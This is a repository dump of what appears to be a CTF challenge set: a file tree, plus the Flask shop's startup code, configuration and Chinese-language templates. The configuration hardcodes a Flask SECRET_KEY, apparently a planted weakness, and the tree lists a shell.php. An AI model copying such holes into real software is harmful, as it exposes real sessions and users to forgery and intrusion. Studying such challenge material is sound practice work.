├── Flaskshop ├── run.py ├── taobao │ ├── __init__.py │ ├── forms.py │ ├── models.py │ ├── routes.py │ ├── static │ │ ├── bootstrap.min.css │ │ ├── bootstrap.min.js │ │ ├── jquery-3.2.1.slim.min.js │ │ ├── main.css │ │ └── popper.min.js │ ├── taobaotest.db │ └── templates │ │ ├── account_about.html │ │ ├── account_layout.html │ │ ├── before_find_password.html │ │ ├── completed_orders.html │ │ ├── coustomer_detail_manager.html │ │ ├── crew_account.html │ │ ├── crew_market.html │ │ ├── crew_order_manager.html │ │ ├── customer_account.html │ │ ├── customer_check_supplier_products.html │ │ ├── customer_order_manager.html │ │ ├── home.html │ │ ├── layout.html │ │ ├── login.html │ │ ├── new_customer_detail.html │ │ ├── register.html │ │ ├── reset_request.html │ │ ├── reset_token.html │ │ ├── search.html │ │ ├── security_check.html │ │ ├── shopping_car.html │ │ ├── shou_supplier_crews.html │ │ ├── show_confirm_waitting_orders.html │ │ ├── show_customer_detail.html │ │ ├── show_order_details.html │ │ ├── show_supplier_product.html │ │ ├── supplier_account.html │ │ ├── supplier_add_product_count.html │ │ ├── supplier_crew_manager.html │ │ ├── supplier_new_product.html │ │ ├── supplier_product_manager.html │ │ ├── supplier_update_product.html │ │ ├── traning_orders.html │ │ ├── update_crew_info.html │ │ ├── update_customer_detail.html │ │ ├── update_info.html │ │ ├── update_password.html │ │ ├── update_supplier_info.html │ │ ├── upload.html │ │ └── waitting_orders.html └── writeup.pdf ├── LICENSE ├── README.md ├── easyWEB ├── docker-compose.yml ├── web1 │ ├── Dockerfile │ └── html │ │ ├── common │ │ ├── cacf.php │ │ ├── function.php │ │ └── home.php │ │ ├── geez.sql │ │ ├── include │ │ ├── config.php │ │ ├── log1.php │ │ └── shell.php │ │ ├── index.php │ │ ├── lib │ │ ├── File.php │ │ ├── User.php │ │ ├── base.php │ │ └── run.php │ │ ├── log.php │ │ ├── org │ │ └── smarty │ │ │ ├── Autofoucer.php │ │ │ ├── Autoloader.php │ │ │ ├── Smarty.class.php │ │ │ ├── SmartyBC.class.php │ │ │ ├── debug.tpl │ │ │ ├── plugins │ │ │ ├── block.textformat.php │ │ │ ├── function.counter.php │ │ │ ├── function.cycle.php │ │ │ ├── function.fetch.php │ │ │ ├── function.html_checkboxes.php │ │ │ ├── function.html_image.php │ │ │ ├── function.html_options.php │ │ │ ├── function.html_radios.php │ │ │ ├── function.html_select_date.php │ │ │ ├── function.html_select_time.php │ │ │ ├── function.html_table.php │ │ │ ├── function.mailto.php │ │ │ ├── function.math.php │ │ │ ├── modifier.capitalize.php │ │ │ ├── modifier.date_format.php │ │ │ ├── modifier.debug_print_var.php │ │ │ ├── modifier.escape.php │ │ │ ├── modifier.regex_replace.php │ │ │ ├── modifier.replace.php │ │ │ ├── modifier.spacify.php │ │ │ ├── modifier.truncate.php │ │ │ ├── modifiercompiler.cat.php │ │ │ ├── modifiercompiler.count_characters.php │ │ │ ├── modifiercompiler.count_paragraphs.php │ │ │ ├── modifiercompiler.count_sentences.php │ │ │ ├── modifiercompiler.count_words.php │ │ │ ├── modifiercompiler.default.php │ │ │ ├── modifiercompiler.escape.php │ │ │ ├── modifiercompiler.from_charset.php │ │ │ ├── modifiercompiler.indent.php │ │ │ ├── modifiercompiler.lower.php │ │ │ ├── modifiercompiler.noprint.php │ │ │ ├── modifiercompiler.string_format.php │ │ │ ├── modifiercompiler.strip.php │ │ │ ├── modifiercompiler.strip_tags.php │ │ │ ├── modifiercompiler.to_charset.php │ │ │ ├── modifiercompiler.unescape.php │ │ │ ├── modifiercompiler.upper.php │ │ │ ├── modifiercompiler.wordwrap.php │ │ │ ├── outputfilter.trimwhitespace.php │ │ │ ├── shared.escape_special_chars.php │ │ │ ├── shared.literal_compiler_param.php │ │ │ ├── shared.make_timestamp.php │ │ │ ├── shared.mb_str_replace.php │ │ │ ├── shared.mb_unicode.php │ │ │ ├── shared.mb_wordwrap.php │ │ │ └── variablefilter.htmlspecialchars.php │ │ │ └── sysplugins │ │ │ ├── smarty_cacheresource.php │ │ │ ├── smarty_cacheresource_custom.php │ │ │ ├── smarty_cacheresource_keyvaluestore.php │ │ │ ├── smarty_data.php │ │ │ ├── smarty_internal_cacheresource_file.php │ │ │ ├── smarty_internal_compile_append.php │ │ │ ├── smarty_internal_compile_assign.php │ │ │ ├── smarty_internal_compile_block.php │ │ │ ├── smarty_internal_compile_break.php │ │ │ ├── smarty_internal_compile_call.php │ │ │ ├── smarty_internal_compile_capture.php │ │ │ ├── smarty_internal_compile_config_load.php │ │ │ ├── smarty_internal_compile_continue.php │ │ │ ├── smarty_internal_compile_debug.php │ │ │ ├── smarty_internal_compile_eval.php │ │ │ ├── smarty_internal_compile_extends.php │ │ │ ├── smarty_internal_compile_for.php │ │ │ ├── smarty_internal_compile_foreach.php │ │ │ ├── smarty_internal_compile_function.php │ │ │ ├── smarty_internal_compile_if.php │ │ │ ├── smarty_internal_compile_include.php │ │ │ ├── smarty_internal_compile_include_php.php │ │ │ ├── smarty_internal_compile_insert.php │ │ │ ├── smarty_internal_compile_ldelim.php │ │ │ ├── smarty_internal_compile_nocache.php │ │ │ ├── smarty_internal_compile_private_block_plugin.php │ │ │ ├── smarty_internal_compile_private_function_plugin.php │ │ │ ├── smarty_internal_compile_private_modifier.php │ │ │ ├── smarty_internal_compile_private_object_block_function.php │ │ │ ├── smarty_internal_compile_private_object_function.php │ │ │ ├── smarty_internal_compile_private_php.php │ │ │ ├── smarty_internal_compile_private_print_expression.php │ │ │ ├── smarty_internal_compile_private_registered_block.php │ │ │ ├── smarty_internal_compile_private_registered_function.php │ │ │ ├── smarty_internal_compile_private_special_variable.php │ │ │ ├── smarty_internal_compile_rdelim.php │ │ │ ├── smarty_internal_compile_section.php │ │ │ ├── smarty_internal_compile_setfilter.php │ │ │ ├── smarty_internal_compile_while.php │ │ │ ├── smarty_internal_compilebase.php │ │ │ ├── smarty_internal_config_file_compiler.php │ │ │ ├── smarty_internal_configfilelexer.php │ │ │ ├── smarty_internal_configfileparser.php │ │ │ ├── smarty_internal_data.php │ │ │ ├── smarty_internal_debug.php │ │ │ ├── smarty_internal_extension_codeframe.php │ │ │ ├── smarty_internal_extension_config.php │ │ │ ├── smarty_internal_extension_defaulttemplatehandler.php │ │ │ ├── smarty_internal_filter_handler.php │ │ │ ├── smarty_internal_function_call_handler.php │ │ │ ├── smarty_internal_get_include_path.php │ │ │ ├── smarty_internal_nocache_insert.php │ │ │ ├── smarty_internal_parsetree.php │ │ │ ├── smarty_internal_parsetree_code.php │ │ │ ├── smarty_internal_parsetree_dq.php │ │ │ ├── smarty_internal_parsetree_dqcontent.php │ │ │ ├── smarty_internal_parsetree_tag.php │ │ │ ├── smarty_internal_parsetree_template.php │ │ │ ├── smarty_internal_parsetree_text.php │ │ │ ├── smarty_internal_resource_eval.php │ │ │ ├── smarty_internal_resource_extends.php │ │ │ ├── smarty_internal_resource_file.php │ │ │ ├── smarty_internal_resource_php.php │ │ │ ├── smarty_internal_resource_registered.php │ │ │ ├── smarty_internal_resource_stream.php │ │ │ ├── smarty_internal_resource_string.php │ │ │ ├── smarty_internal_smartytemplatecompiler.php │ │ │ ├── smarty_internal_template.php │ │ │ ├── smarty_internal_templatebase.php │ │ │ ├── smarty_internal_templatecompilerbase.php │ │ │ ├── smarty_internal_templatelexer.php │ │ │ ├── smarty_internal_templateparser.php │ │ │ ├── smarty_internal_testinstall.php │ │ │ ├── smarty_internal_utility.php │ │ │ ├── smarty_internal_write_file.php │ │ │ ├── smarty_resource.php │ │ │ ├── smarty_resource_custom.php │ │ │ ├── smarty_resource_recompiled.php │ │ │ ├── smarty_resource_uncompiled.php │ │ │ ├── smarty_security.php │ │ │ ├── smarty_template_cached.php │ │ │ ├── smarty_template_compiled.php │ │ │ ├── smarty_template_config.php │ │ │ ├── smarty_template_source.php │ │ │ ├── smarty_undefined_variable.php │ │ │ ├── smarty_variable.php │ │ │ ├── smartycompilerexception.php │ │ │ └── smartyexception.php │ │ ├── public │ │ ├── css │ │ │ ├── bootstrap-theme.css │ │ │ ├── bootstrap-theme.css.map │ │ │ ├── bootstrap-theme.min.css │ │ │ ├── bootstrap.css │ │ │ ├── bootstrap.css.map │ │ │ ├── bootstrap.min.css │ │ │ ├── gongyong.css │ │ │ ├── reset.css │ │ │ └── style.css │ │ ├── image │ │ │ ├── background.jpg │ │ │ ├── bg.jpg │ │ │ ├── big.jpg │ │ │ ├── name.png │ │ │ └── password.png │ │ └── js │ │ │ ├── app.js │ │ │ ├── bootstrap.js │ │ │ ├── bootstrap.min.js │ │ │ ├── jquery-1.8.3.min.js │ │ │ ├── jquery.min.js │ │ │ ├── npm.js │ │ │ └── particles.min.js │ │ ├── supervisord.conf │ │ └── templates │ │ ├── error.tpl │ │ ├── home.tpl │ │ ├── index.tpl │ │ ├── register.tpl │ │ ├── success.tpl │ │ └── updatepass.tpl └── writeup.pdf ├── pwn ├── calculator ├── calculator.bak └── writeup.py └── thinkPHP ├── .gitignore ├── LICENSE.txt ├── application ├── .htaccess ├── admin │ ├── config.php │ ├── controller │ │ ├── Admin.php │ │ ├── Article.php │ │ ├── Base.php │ │ ├── Cate.php │ │ ├── Index.php │ │ ├── Links.php │ │ └── Login.php │ ├── model │ │ ├── Admin.php │ │ ├── Article.php │ │ ├── Cate.php │ │ └── Links.php │ ├── validate │ │ ├── Admin.php │ │ ├── Article.php │ │ ├── Cate.php │ │ ├── Links.php │ │ └── Tags.php │ └── view │ │ ├── admin │ │ ├── add.htm │ │ ├── edit.htm │ │ └── lst.htm │ │ ├── article │ │ ├── add.htm │ │ ├── edit.htm │ │ └── lst.htm │ │ ├── cate │ │ ├── add.htm │ │ ├── edit.htm │ │ └── lst.htm │ │ ├── common │ │ ├── left.htm │ │ └── top.htm │ │ ├── index │ │ └── index.htm │ │ ├── links │ │ ├── add.htm │ │ ├── edit.htm │ │ └── lst.htm │ │ └── login │ │ └── login.htm ├── command.php ├── common.php ├── config.php ├── database.php ├── index │ ├── common.php │ ├── config.php │ ├── controller │ │ ├── Article.php │ │ ├── Base.php │ │ ├── Cate.php │ │ ├── Index.php │ │ └── Search.php │ └── view │ │ ├── article │ │ └── article.html │ │ ├── cate │ │ └── cate.html │ │ ├── common │ │ ├── foot.html │ │ ├── header.html │ │ └── right.html │ │ ├── index │ │ └── index.html │ │ └── search │ │ └── search.html ├── route.php └── tags.php ├── blog.sql ├── build.php ├── composer.json ├── extend └── .gitignore ├── phpunit.xml ├── public ├── .htaccess ├── blog.sql ├── favicon.ico ├── index.php ├── robots.txt ├── router.php └── static │ └── .gitignore ├── runtime └── temp │ ├── 3f3091e7a346cc474820a2a4d5d14333.php │ ├── 549f8e214256acc77c6d71d90dde481a.php │ ├── 5944f8a212d3e204c557b2fecd7b261a.php │ ├── 6073676e7ea783822304d5de1e2c1312.php │ ├── 7729e0943396e8a1340f5e4073f07a18.php │ ├── c0edf44dce95ffc9c1d548d9364e8dc9.php │ ├── deeca46088bab20aa254dff5b1dd2fe5.php │ └── e71583a3903d6016ef1ca6d413119863.php ├── tests ├── ExampleTest.php └── TestCase.php ├── think ├── vendor └── .gitignore └── writeup.pdf /Flaskshop/run.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from taobao import app,db 3 | from werkzeug.contrib.fixers import ProxyFix 4 | app.wsgi_app=ProxyFix(app.wsgi_app) 5 | 6 | 7 | 8 | if __name__ == '__main__': 9 | app.run(debug=False) 10 | db.create_all() 11 | -------------------------------------------------------------------------------- /Flaskshop/taobao/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from flask import Flask 3 | from flask_sqlalchemy import SQLAlchemy 4 | from flask_bcrypt import Bcrypt 5 | from flask_login import LoginManager 6 | from flask_mail import Mail 7 | 8 | app = Flask(__name__) 9 | app.config["SQLALCHEMY_DATABASE_URI"] = r"sqlite:///taobaotest.db?check_same_thread=False" 10 | app.config['SECRET_KEY'] = '5791628bb0b13ce0c576dfde280ba255' 11 | app.config["SQLALCHEMY_TRACK_MODIFICATIONS"]=True 12 | 13 | 14 | db = SQLAlchemy(app) 15 | bcrypt = Bcrypt(app) 16 | login_manager = LoginManager(app) 17 | login_manager.login_view = "login" 18 | login_manager.login_message_category ="info" 19 | 20 | 21 | 22 | 23 | from taobao import routes 24 | -------------------------------------------------------------------------------- /Flaskshop/taobao/static/main.css: -------------------------------------------------------------------------------- 1 | body { 2 | background: #fafafa; 3 | color: #333333; 4 | margin-top: 5rem; 5 | } 6 | 7 | h1, h2, h3, h4, h5, h6 { 8 | color: #444444; 9 | } 10 | 11 | .bg-steel { 12 | background-color: #5f788a; 13 | } 14 | 15 | .site-header .navbar-nav .nav-link { 16 | color: #cbd5db; 17 | } 18 | 19 | .site-header .navbar-nav .nav-link:hover { 20 | color: #ffffff; 21 | } 22 | 23 | .site-header .navbar-nav .nav-link.active { 24 | font-weight: 500; 25 | } 26 | 27 | .content-section { 28 | background: #ffffff; 29 | padding: 10px 20px; 30 | border: 1px solid #dddddd; 31 | border-radius: 3px; 32 | margin-bottom: 20px; 33 | } 34 | 35 | .article-title { 36 | color: #444444; 37 | } 38 | 39 | a.article-title:hover { 40 | color: #428bca; 41 | text-decoration: none; 42 | } 43 | 44 | .article-content { 45 | white-space: pre-line; 46 | } 47 | 48 | .article-img { 49 | height: 65px; 50 | width: 65px; 51 | margin-right: 16px; 52 | } 53 | 54 | .article-metadata { 55 | padding-bottom: 1px; 56 | margin-bottom: 4px; 57 | border-bottom: 1px solid #e3e3e3 58 | } 59 | 60 | .article-metadata a:hover { 61 | color: #333; 62 | text-decoration: none; 63 | } 64 | 65 | .article-svg { 66 | width: 25px; 67 | height: 25px; 68 | vertical-align: middle; 69 | } 70 | 71 | .account-img { 72 | height: 125px; 73 | width: 125px; 74 | margin-right: 20px; 75 | margin-bottom: 16px; 76 | } 77 | 78 | .account-heading { 79 | font-size: 2.5rem; 80 | } 81 | -------------------------------------------------------------------------------- /Flaskshop/taobao/taobaotest.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/Flaskshop/taobao/taobaotest.db -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/account_about.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

About page


4 | 5 | {% endblock info %} 6 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/account_layout.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 |
6 | 7 |

{{ current_user.email }}

8 |
9 |
10 | {% block info %}{% endblock info %} 11 |
12 | 13 | {% endblock content %} 14 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/before_find_password.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 找回密码 8 |
9 | {{ form.role.label(class="form-control-label") }} 10 | 11 | {% if form.role.errors %} 12 | {{ form.role(class="form-control form-control-lg is-invalid") }} 13 |
14 | {% for error in form.role.errors %} 15 | {{ error }} 16 | {% endfor %} 17 |
18 | {% else %} 19 | {{ form.role(class="form-control form-control-lg") }} 20 | {% endif %} 21 |
22 |
23 | {{ form.email.label(class="form-control-label") }} 24 | 25 | {% if form.email.errors %} 26 | {{ form.email(class="form-control form-control-lg is-invalid") }} 27 |
28 | {% for error in form.email.errors %} 29 | {{ error }} 30 | {% endfor %} 31 |
32 | {% else %} 33 | {{ form.email(class="form-control form-control-lg") }} 34 | {% endif %} 35 |
36 |
37 | {{ form.confirm.label(class="form-control-label") }} 38 | 39 | {% if form.confirm.errors %} 40 | {{ form.confirm(class="form-control form-control-lg is-invalid") }} 41 |
42 | {% for error in form.confirm.errors %} 43 | {{ error }} 44 | {% endfor %} 45 |
46 | {% else %} 47 | {{ form.confirm(class="form-control form-control-lg") }} 48 | {% endif %} 49 |
50 | 51 |
52 |
53 | {{ form.submit(class="btn btn-outline-info") }} 54 |
55 |
56 | 57 |
58 | {% endblock content %} 59 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/completed_orders.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

收货成功,交易完成的订单


4 | {% if orders %} 5 | {% for order in orders %} 6 |
7 | 订单编号:{{ order.id}}
8 | 下单时间:{{ order.start_time}}
完成时间:{{ order.end_time}}
9 | 订单价格:{{ order.total_price }}
10 | 订单的状态:收货成功,交易完成
11 | 订单详情 12 | 13 |
14 | {% endfor %} 15 | {% else %} 16 | 空空如也,什么也没有哦。 17 | {% endif %} 18 | 19 | {% endblock info %} 20 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/coustomer_detail_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

收货地址管理


4 | 添加我的收货地址
5 | 查看我的收货地址
6 | {% endblock info %} 7 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/crew_account.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 | {% if crew.is_employ !=0 %} 4 | 我的老板:{{ supplier.supplier_name }}
5 | {% if supplier.mission !="作为老板的你,今天还没有给员工分配任务" %} 6 |
今日任务:
 7 |
{{ supplier.mission }}
8 | {% else %} 9 | 今日任务:老板今天没有布置什么特别哦
10 | {% endif %}
11 | 完成顾客的订单
12 | {% else %} 13 | 不好意思,目前为止你还没有被老板雇佣呢!
14 | {% endif %} 15 | 管理我的基本信息
16 | 完善我的求职信息
17 | {% endblock info %} 18 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/crew_market.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

人才市场

5 |
6 |
7 | {% if crews%} 8 | {% for crew in crews %} 9 |
10 |
11 | 求职人:{{ crew.crew_name }}
12 | 求职宣言:{{crew.massage }}
13 |
14 | {% if current_user.table_name =="Supplier" %} 15 |
我想录用他 16 | {% endif %} 17 | 18 |
19 | 20 | {% endfor %} 21 | {% else %} 22 |
23 |

今天的人才都被老板带走了 下次早点过来吧!

24 |
25 | {% endif %} 26 | 27 |
28 | 29 | 30 | 31 | {% endblock content %} 32 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/crew_order_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

雇员订单管理


4 | 需要确认发货的订单

5 | {% endblock info %} 6 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/customer_account.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 | 管理我的收货地址
4 | 管理我的订单
5 | 管理我的基本信息
6 | 7 | {% endblock info %} 8 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/customer_check_supplier_products.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 | 4 |
5 |

{{ supplier.supplier_name }}


6 | 电话:{{ supplier.telephone }}
7 | 地址:{{ supplier.address }}
8 |
9 | {% if products %} 10 | {% for product in products %} 11 |
12 | 13 | 商品名称:{{ product.name }}
14 | 商品类别:{{ product.sort }}
15 | 商品价格:{{ product.price }}
16 | 商品细节:{{ product.detail }}
17 | 商品剩余库存量:{{ product.product_count }}
18 | {% if current_user.table_name =="Customer" %} 19 | 我想购买它 20 | {% endif %} 21 |
22 |
23 | {% endfor %} 24 | {% endif %} 25 | 26 | {% endblock %} 27 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/customer_order_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

我的订单管理


4 | 等待发货的订单

5 | 等待确认收货的订单

6 | 完成交易的订单

7 | {% endblock info %} 8 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/home.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

商品市场

5 |
6 |
7 | {% if products %} 8 | {% for product in products %} 9 | {% if product.product_count !=0 %} 10 |
11 | 商家名称:{{ product.supplier.first().supplier_name}}
12 | 商品名称:{{ product.name }}
13 | 商品类别:{{ product.sort }}
14 | 商品价格:{{ product.price }}
15 | 商品细节:{{ product.detail }}
16 | 商品剩余库存量:{{ product.product_count }}
17 | 18 | {% if current_user.table_name =="Customer" %} 19 |
我想购买它 20 | {% endif %} 21 |
22 | {% endif %} 23 | 24 | 25 | 26 | 27 | {% endfor %} 28 | {% else %} 29 |
30 |

今天的商品都被买走了 下次早点过来吧!

31 |
32 | {% endif %} 33 | 34 |
35 | 36 | 37 | 38 | {% endblock content %} 39 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/new_customer_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 添加收获地址 8 |
9 | {{ form.consignee.label(class="form-control-label") }} 10 | 11 | {% if form.consignee.errors %} 12 | {{ form.consignee(class="form-control form-control-lg is-invalid") }} 13 |
14 | {% for error in form.consignee.errors %} 15 | {{ error }} 16 | {% endfor %} 17 |
18 | {% else %} 19 | {{ form.consignee(class="form-control form-control-lg") }} 20 | {% endif %} 21 |
22 |
23 | {{ form.address.label(class="form-control-label") }} 24 | 25 | {% if form.address.errors %} 26 | {{ form.address(class="form-control form-control-lg is-invalid") }} 27 |
28 | {% for error in form.address.errors %} 29 | {{ error }} 30 | {% endfor %} 31 |
32 | {% else %} 33 | {{ form.address(class="form-control form-control-lg") }} 34 | {% endif %} 35 |
36 |
37 | {{ form.telephone.label(class="form-control-label") }} 38 | {% if form.telephone.errors %} 39 | {{ form.telephone(class="form-control form-control-lg is-invalid") }} 40 |
41 | {% for error in form.telephone.errors %} 42 | {{ error }} 43 | {% endfor %} 44 |
45 | {% else %} 46 | {{ form.telephone(class="form-control form-control-lg") }} 47 | {% endif %} 48 |
49 |
50 |
51 | {{ form.submit(class="btn btn-outline-info") }} 52 |
53 |
54 |
55 | {% endblock content %} 56 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/reset_request.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | Reset Password 8 |
9 | {{ form.role.label(class="form-control-label") }} 10 | {% if form.role.errors %} 11 | {{ form.role(class="form-control form-control-lg is-invalid") }} 12 |
13 | {% for error in form.role.errors %} 14 | {{ error }} 15 | {% endfor %} 16 |
17 | {% else %} 18 | {{ form.role(class="form-control form-control-lg") }} 19 | {% endif %} 20 |
21 |
22 | {{ form.email.label(class="form-control-label") }} 23 | {% if form.email.errors %} 24 | {{ form.email(class="form-control form-control-lg is-invalid") }} 25 |
26 | {% for error in form.email.errors %} 27 | {{ error }} 28 | {% endfor %} 29 |
30 | {% else %} 31 | {{ form.email(class="form-control form-control-lg") }} 32 | {% endif %} 33 |
34 |
35 |
36 | {{ form.submit(class="btn btn-outline-info") }} 37 |
38 |
39 |
40 | {% endblock content %} 41 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/reset_token.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | Reset Password 8 |
9 | {{ form.password.label(class="form-control-label") }} 10 | {% if form.password.errors %} 11 | {{ form.password(class="form-control form-control-lg is-invalid") }} 12 |
13 | {% for error in form.password.errors %} 14 | {{ error }} 15 | {% endfor %} 16 |
17 | {% else %} 18 | {{ form.password(class="form-control form-control-lg") }} 19 | {% endif %} 20 |
21 |
22 | {{ form.confirm_password.label(class="form-control-label") }} 23 | {% if form.confirm_password.errors %} 24 | {{ form.confirm_password(class="form-control form-control-lg is-invalid") }} 25 |
26 | {% for error in form.confirm_password.errors %} 27 | {{ error }} 28 | {% endfor %} 29 |
30 | {% else %} 31 | {{ form.confirm_password(class="form-control form-control-lg") }} 32 | {% endif %} 33 |
34 |
35 |
36 | {{ form.submit(class="btn btn-outline-info") }} 37 |
38 |
39 |
40 | {% endblock content %} 41 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/search.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 | 4 | 5 | 6 | 7 | upload 8 | 9 | 10 |

执行结果

11 | {{ msg }} 12 | 13 | 14 | 15 | {% endblock content %} 16 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/security_check.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 身份验证 8 |
9 | {{ form.password.label(class="form-control-label") }} 10 | {% if form.password.errors %} 11 | {{ form.password(class="form-control form-control-lg is-invalid") }} 12 |
13 | {% for error in form.password.errors %} 14 | {{ error }} 15 | {% endfor %} 16 |
17 | {% else %} 18 | {{ form.password(class="form-control form-control-lg") }} 19 | {% endif %} 20 |
21 | 22 |
23 |
24 | {{ form.submit(class="btn btn-outline-info") }} 25 |
26 | 27 |
28 | 29 |
30 | 31 | {% endblock content %} 32 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/shopping_car.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

我的购物车


5 |
6 | {% if orderdetails %} 7 |
8 | {% if customer_detail_default %} 9 | 已经设置了默认地址 查看
10 | {% else %} 11 | 尚未设置默认地址 前往设置
12 | {% endif %} 13 | 14 | 15 | 已经付款,确认下单    总价格:{{ shopping_car.total_price }} 16 |
17 |
18 | {% for detail in orderdetails %} 19 |
20 |
21 | 22 | 商家:{{ detail.product.supplier.first().supplier_name}}
23 | 商品:{{ detail.product.name }}
24 | 价格:{{ detail.product.price }}
25 | 订购数量:{{ detail.product_count}}
26 | 剩余库存量:{{ detail.product.product_count }}

27 |
28 | 移出购物车     29 | 增加 10个     30 | 增加 1个      31 | 减少 1个      32 | 减少 10个     33 |
34 |
35 | {% endfor %} 36 | {% else %} 37 |
38 | 你的购物车空空如也!不如去商品市场采购一波? 39 |
40 | {% endif %} 41 | {% endblock %} 42 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/shou_supplier_crews.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

我的雇员列表


4 | {% if crews %} 5 | {% for crew in crews %} 6 |
7 | 8 | 雇员名称:{{ crew.crew_name }}
9 | 地址:{{ crew.address }}
10 | 电话:{{ crew.telephone }}
11 | 12 | 解雇员工 13 |
14 | 15 |
16 | {% endfor %} 17 | {% else %} 18 | 没有人哦 人才市场看看吧 19 | {% endif %} 20 | 21 | {% endblock info %} 22 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/show_confirm_waitting_orders.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

需要确认发货的订单


4 | {% if orders %} 5 | {% for order in orders %} 6 |
7 | 订单编号:{{ order.id}}
8 | 下单时间:{{ order.start_time}}
9 | 订单价格:{{ order.total_price }}
10 | 订单的状态:等待确认发货
11 | 订单详情 12 | 13 |
14 | {% endfor %} 15 | {% else %} 16 | 空空如也,什么也没有哦。 17 | {% endif %} 18 | 19 | {% endblock info %} 20 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/show_customer_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

我的收货地址


4 | {% if details %} 5 | 继续 添加地址 6 | {% for detail in details %} 7 |
8 | ----------------------------------------------
9 | {% if detail.is_default == 1%} 10 | 这是你的默认地址

11 | {% else %} 12 | 设置为默认地址

13 | {% endif %} 14 | 收货人:{{ detail.consignee }}
15 | 地址:{{ detail.address }}
16 | 电话:{{ detail.telephone }} 17 | 18 | 修改地址 19 | 删除地址 20 | 21 |
22 | ----------------------------------------------
23 |
24 |
25 |
26 | {% endfor %} 27 | {% else %} 28 | 尚未添加任何收货地址 -> 添加地址 29 | {% endif %} 30 | 31 | {% endblock info %} 32 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/show_order_details.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

订单详情


5 | 总价格 :{{ order.total_price }}
6 | 订单编号:{{order_address.order_id }}
7 | 收货人:{{ order_address.consignee }}
8 | 电话:{{ order_address.telephone }}
9 | 收货地址:{{ order_address.address }}
10 |
11 | {% if orderdetails %} 12 | 13 | {% for detail in orderdetails %} 14 |
15 | 商品细节
16 | 商家:{{ detail.product.supplier.first().supplier_name}}
17 | 商品:{{ detail.product.name }}
18 | 价格:{{ detail.product.price }}
19 | 订购数量:{{ detail.product_count}}
20 |
21 | 22 | 23 |
24 | {% endfor %} 25 |
26 | {% endif %} 27 | {% if current_user.table_name =="Crew"%} 28 |
29 | 30 |         确认发货 31 | 32 |
33 | {% endif %} 34 | 35 | {% endblock content %} 36 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/show_supplier_product.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

我的产品列表


4 | {% if products %} 5 | 继续 添加产品 6 | {% for product in products %} 7 |
8 | 9 | 商品名称:{{ product.name }}
10 | 商品类别:{{ product.sort }}
11 | 商品价格:{{ product.price }}
12 | 商品细节:{{ product.detail }}
13 | 商品剩余库存量:{{ product.product_count }}
14 | ----------------------------------------------
15 | 修改商品信息 16 | 删除产品信息 17 | 增加库存 18 |
19 | 20 |
21 |
22 |
